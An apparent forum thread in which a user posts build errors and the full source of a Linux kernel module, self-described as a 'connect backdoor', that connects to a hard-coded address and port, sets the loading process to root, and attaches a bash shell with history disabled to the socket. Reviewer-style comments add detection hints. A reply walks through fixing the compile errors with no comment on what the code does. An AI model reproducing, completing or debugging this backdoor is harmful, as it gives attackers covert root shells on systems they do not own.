
Full Version: linux lkm
[root@localhost test1]# make
make -C /lib/modules/2.6.32-642.el6.x86_64/build M=/root/test1 modules
make[1]: Entering directory `/usr/src/kernels/2.6.32-642.el6.x86_64'
  CC [M]  /root/test1/1.o
/root/test1/1.c: In function ‘k_connect’:
/root/test1/1.c:62: error: too few arguments to function ‘sock_map_fd’
/root/test1/1.c:86: error: ‘struct task_struct’ has no member named ‘uid’
/root/test1/1.c:87: error: ‘struct task_struct’ has no member named ‘euid’
/root/test1/1.c:88: error: ‘struct task_struct’ has no member named ‘gid’
/root/test1/1.c:89: error: ‘struct task_struct’ has no member named ‘egid’
/root/test1/1.c:95: error: implicit declaration of function ‘execve’
/root/test1/1.c:48: warning: unused variable ‘newsock’
make[2]: *** [/root/test1/1.o] Error 1
make[1]: *** [_module_/root/test1] Error 2
make[1]: Leaving directory `/usr/src/kernels/2.6.32-642.el6.x86_64'
make: *** [all] Error 2
[root@localhost test1]# uname -a
Linux localhost.localdomain 2.6.32-642.el6.x86_64 #1 SMP Tue May 10 17:27:01 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
[root@localhost test1]# cat /etc/issue
CentOS release 6.8 (Final)
Kernel \r on an \m

[root@localhost test1]#

[root@localhost test1]# cat 1.c
/*
 * Kernel mode connect backdoor, haha~
 *
 * just a demo module to teach you how to write a backdoor in kernel mode,
 * i believe you can add more code to make it strong and powerful, wulala.
 *
 * by wzt <wzt#xsec.org>
 *
 */

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/socket.h>
#include <linux/net.h>
#include <linux/in.h>
#include <linux/fs.h>
#include <linux/file.h>
#include <linux/types.h>
#include <linux/errno.h>
#include <linux/string.h>
#include <linux/unistd.h>
#include <net/sock.h>
#include <asm/uaccess.h>
#include <asm/unistd.h>
#include "syscalls.h"

/* Hard-coded call-back address and port. If a module like this is ever found on a
 * host, this pair is the first indicator to pivot on (egress logs, netflow). */
#define REMOTO_IP "192.168.75.1"
/* Lower-case macro name: any later identifier called `port` is silently rewritten to 1080. */
#define port 1080

MODULE_LICENSE("GPL");
MODULE_AUTHOR("wzt");

/* Expands (syscalls.h) to a function `int dup2(int oldfd, int newfd)` whose body is a
 * raw `int $0x80` trap — a 32-bit userspace syscall stub pasted into kernel code. */
static inline my_syscall2(int, dup2, int, oldfd, int, newfd);

/* argv for the shell that replaces the loading process: bash with its startup files
 * (--noprofile/--norc) skipped, so nothing the admin put in them runs or logs. */
static char *earg[4] = { "/bin/bash", "--noprofile", "--norc", NULL };

/* Environment for that shell. HISTFILE=/dev/null keeps the session out of bash history,
 * a deliberate anti-forensics marker worth flagging in detection content. Non-static, so
 * `env` is an exported global symbol of the module. */
char *env[]={
 "TERM=linux",
 "HOME=/",
 "PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin"
 ":/usr/local/sbin",
 "HISTFILE=/dev/null",
 NULL };

/*
 * Creates a kernel socket, connects it to REMOTO_IP:port, overwrites the
 * credentials of the current task (the process that is loading the module),
 * points fds 0/1/2 at the socket and replaces that task's image with /bin/bash.
 * Loading the module is therefore itself the compromise event.
 *
 * Returns -1 when socket creation, fd mapping or connect fails; 1 only if
 * execve() returns.
 *
 * Defender notes: a kernel module that opens an outbound connection to a
 * hard-coded address from its init path and rewrites task credentials from
 * kernel context is unambiguously malicious. Module-load logging and egress
 * monitoring for the REMOTO_IP:port pair are the practical detection points.
 * The build log at the top of this page shows several of the lines below do
 * not compile against this kernel (2.6.32-642.el6.x86_64).
 */
int k_connect(void)
{
 struct task_struct *tsk = current;
 /* newsock is declared but never used (the build log reports this warning). */
 struct socket *sock,*newsock;
 struct sockaddr_in server;
 int sockfd,i;
 int error = 0,len = sizeof(struct sockaddr);

 /* Disables the user/kernel address-space check so later calls accept kernel pointers. */
 set_fs(KERNEL_DS);

 error = sock_create(AF_INET,SOCK_STREAM,0,&sock);
 if (error < 0) {
 printk("[-] socket_create failed: %d\n",error);
 sock_release(sock);
 return -1;
 }

 /* The build log reports that sock_map_fd() takes two arguments on this kernel. */
 sockfd = sock_map_fd(sock);
 if (sockfd < 0) {
 printk("[-] sock_map_fd() failed.\n");
 sock_release(sock);
 return -1;
 }

 /* Zeroes the sin_zero padding by hand. */
 for (i = 0; i < 8; i++)
 server.sin_zero[i] = 0;

 server.sin_family = PF_INET;
 /* in_aton() turns the dotted-quad string into a network-order address. */
 server.sin_addr.s_addr = in_aton(REMOTO_IP);
 server.sin_port = htons(port);

 /* Connects through the socket's ops table, passing the backing file's flags. */
 error = sock->ops->connect(sock,(struct sockaddr *)&server,len,sock->file->f_flags);
 if (error < 0) {
 /* The socket and its fd are not released on this path. */
 printk("[-] connect to %s failed.\n",REMOTO_IP);
 return -1;
 }

 printk("[+] connect to %s ok.\n",REMOTO_IP);

 /* Second set_fs(KERNEL_DS); the first is still in effect. */
 set_fs(KERNEL_DS);

 /* Credential rewrite directly on task_struct: uid/euid/egid to root, gid to an
  * odd constant (cannot tell from here why it differs from the others). The build
  * log says these members do not exist on this kernel. */
 tsk->uid = 0;
 tsk->euid = 0;
 tsk->gid = 0x11111111;
 tsk->egid = 0;

 /* Wires stdin/stdout/stderr of the loading process to the connected socket,
  * using the int $0x80 dup2 stub from syscalls.h. */
 dup2(sockfd,0);
 dup2(sockfd,1);
 dup2(sockfd,2);

 /* Replaces the loading process with bash attached to the socket. No execve is
  * declared in kernel scope here (the build log reports the implicit declaration). */
 execve(earg[0], (const char **) earg, (const char **) env);

 /* Only reached if execve() returns. */
 return 1;
}

/*
 * Module entry point: prints a banner and unconditionally calls k_connect(),
 * so the outbound connection and shell are attempted as a side effect of
 * insmod itself. Declared as returning int (what module_init expects) but has
 * no return statement, so the value handed back to the module loader is
 * undefined.
 */
int k_socket_init(void)
{
 printk("[+] kernel socket test start.\n");

 k_connect();
}

/* Module exit: only prints a banner; nothing k_connect() set up is undone here. */
void k_socket_exit(void)
{
 printk("[+] kernel socket test over.\n");
}

/* Registers k_socket_init / k_socket_exit as the module's load and unload hooks. */
module_init(k_socket_init);
module_exit(k_socket_exit);



[root@localhost test1]#

[root@localhost test1]# cat syscalls.h
/* macros de syscalls */

/* NOTE(review): this is a definition, not a declaration, of a global `errno` inside
 * a header, so every translation unit that includes it gets its own copy. The kernel
 * has no errno of its own, which is why the stubs below need one to write to. */
int errno;

/* Converts a raw syscall return (negative errno on failure) into the libc
 * convention: store the positive errno, return -1. The threshold is -(128+1). */
#define my__syscall_return(type, res) \
do { \
    if ((unsigned long)(res) >= (unsigned long)(-(128 + 1))) { \
        errno = -(res); \
        res = -1; \
    } \
    return (type) (res); \
} while (0)

/* XXX - _foo needs to be __foo, while __NR_bar could be _NR_bar. */
/* The my_syscallN macros below are the legacy 32-bit x86 userspace syscall stubs:
 * number in eax, arguments in ebx/ecx/edx/esi/edi, trap via `int $0x80`, with ebx
 * saved and restored around the trap. They have been copied into a kernel module
 * that the build log shows is being compiled for x86_64, which uses a different
 * syscall ABI. Each macro defines a function named `name` taking the listed args. */
#define my_syscall0(type,name) \
type name(void) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
    : "=a" (__res) \
    : "0" (__NR_##name)); \
my__syscall_return(type,__res); \
}

#define my_syscall1(type,name,type1,arg1) \
type name(type1 arg1) \
{ \
long __res; \
__asm__ volatile ("push %%ebx ; movl %2,%%ebx ; int $0x80 ; pop %%ebx" \
    : "=a" (__res) \
    : "0" (__NR_##name),"ri" ((long)(arg1)) : "memory"); \
my__syscall_return(type,__res); \
}

/* Two-argument variant; this is the one 1.c instantiates for dup2. */
#define my_syscall2(type,name,type1,arg1,type2,arg2) \
type name(type1 arg1,type2 arg2) \
{ \
long __res; \
__asm__ volatile ("push %%ebx ; movl %2,%%ebx ; int $0x80 ; pop %%ebx" \
    : "=a" (__res) \
    : "0" (__NR_##name),"ri" ((long)(arg1)),"c" ((long)(arg2)) \
    : "memory"); \
my__syscall_return(type,__res); \
}

#define my_syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \
type name(type1 arg1,type2 arg2,type3 arg3) \
{ \
long __res; \
__asm__ volatile ("push %%ebx ; movl %2,%%ebx ; int $0x80 ; pop %%ebx" \
    : "=a" (__res) \
    : "0" (__NR_##name),"ri" ((long)(arg1)),"c" ((long)(arg2)), \
          "d" ((long)(arg3)) : "memory"); \
my__syscall_return(type,__res); \
}

#define my_syscall4(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4) \
type name (type1 arg1, type2 arg2, type3 arg3, type4 arg4) \
{ \
long __res; \
__asm__ volatile ("push %%ebx ; movl %2,%%ebx ; int $0x80 ; pop %%ebx" \
    : "=a" (__res) \
    : "0" (__NR_##name),"ri" ((long)(arg1)),"c" ((long)(arg2)), \
      "d" ((long)(arg3)),"S" ((long)(arg4)) : "memory"); \
my__syscall_return(type,__res); \
}

/* Five-argument variant: the syscall number is loaded into eax inside the asm
 * string ("i" constraint) instead of being tied to the output register. */
#define my_syscall5(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \
      type5,arg5) \
type name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5) \
{ \
long __res; \
__asm__ volatile ("push %%ebx ; movl %2,%%ebx ; movl %1,%%eax ; " \
                  "int $0x80 ; pop %%ebx" \
    : "=a" (__res) \
    : "i" (__NR_##name),"ri" ((long)(arg1)),"c" ((long)(arg2)), \
      "d" ((long)(arg3)),"S" ((long)(arg4)),"D" ((long)(arg5)) \
    : "memory"); \
my__syscall_return(type,__res); \
}



[root@localhost test1]# cat Makefile
# Out-of-tree kbuild wrapper: builds 1.c as a kernel module against the headers
# of the running kernel (KDIR).
obj-m := 1.o
# NOTE(review): kbuild normally supplies its own compiler and flags; whether this
# CC assignment is honoured by the sub-make below is not shown on this page.
CC = gcc -Wall
KDIR := /lib/modules/$(shell uname -r)/build
PWD := $(shell pwd)

all:
        $(MAKE) -C $(KDIR) M=$(PWD) modules

clean:
        $(MAKE) -C $(KDIR) M=$(PWD) clean
[root@localhost test1]#
I can't see your question, so I'll assume you are asking about the errors shown in the build output.

The errors are in the file /root/test1/1.c, as the make output shows:
- On line 62, you passed a single argument to sock_map_fd(), but it takes two; see:
http://lxr.free-electrons.com/source/net/socket.c#L433

- On lines 86, 87, 88 and 89 you used members that are not declared in struct task_struct. When I googled that struct I found a description that does contain those members (uid, euid, gid, egid); even though it is the same context, I'm not sure whether you and the link are referring to the same task_struct. Here is the link I found:
http://www.tldp.org/LDP/tlk/ds/ds.html

- On line 95 there is an implicit declaration of the function execve, which means you used a function before declaring it. You need either to declare it, or to provide a prototype for it, before the line where it is called. Since (linux/unistd.h) points to (asm/unistd.h), which points to another system header, you might try editing the source (after backing up the current version of the file) to include (unistd.h): the man page of execve() says it lives in unistd.h, which is the file /usr/include/unistd.h, while the others are at /usr/include/(linux|asm)/unistd.h.

I did some kernel development years ago; it's been a while, so this may or may not be helpful.